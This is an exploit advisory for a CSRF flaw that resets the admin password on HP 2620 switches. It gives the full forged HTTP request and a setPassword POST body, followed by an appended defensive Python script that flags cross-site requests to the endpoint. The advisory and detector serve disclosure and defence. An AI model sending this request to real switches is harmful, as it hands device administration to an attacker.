# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability
# Date: 26.09.2013r.
# Exploit Author: Hubert Grądek (PL)
# Software Link: [download link if available]
# Tested on: HP-E2620 24-PoEP // RA.15.05.0006,ROMRA.15.10

HTTP Headers:

http://[IP_ADDR]/html/json.html

Host: [IP_ADDR]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://[IP_ADDR]/html/nhome.html
Cookie: sessionId=ANYTHING
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

POST Content:

method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=Manager
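A defender's check for the request shown above, as an added example that is not part of the original advisory: it classifies captured HTTP requests to the switch's /html/json.html endpoint by whether a setPassword POST carries a Referer or Origin matching the Host header. The sample requests, the 192.0.2.10 address, portal.example and the function names are constructed for illustration.

```python
from urllib.parse import urlsplit

MGMT_PATH = "/html/json.html"  # endpoint named in the advisory
SENSITIVE = "setPassword"      # method name from the advisory's POST body

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()

def source_host(headers):
    """Host the browser reports as the request's source: Origin, else Referer."""
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower()  # "Origin: null" yields ""
    return None

def classify(raw):
    """Return 'ignore', 'same-origin', 'cross-site' or 'no-source'."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or urlsplit(path).path != MGMT_PATH or SENSITIVE not in body:
        return "ignore"
    src = source_host(headers)
    if src is None:
        return "no-source"  # header stripped; cannot be tied to the switch UI
    return "same-origin" if src == headers.get("host", "").lower() else "cross-site"

# Constructed sample requests; 192.0.2.10 stands in for the switch address.
BODY = "method:setPassword&name=admin&password=REDACTED&access=Manager"
REQ = "POST /html/json.html HTTP/1.1\nHost: 192.0.2.10\n"
SAMPLES = {
    "switch_ui": REQ + "Referer: http://192.0.2.10/html/nhome.html\n\n" + BODY,
    "other_site": REQ + "Referer: http://portal.example/news.html\n\n" + BODY,
    "no_referer": REQ + "\n" + BODY,
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, "->", classify(raw))
```

A "cross-site" or "no-source" result on this endpoint is worth alerting on in proxy or capture data. The same comparison enforced server-side, together with a per-session token, is the usual fix for this class of bug.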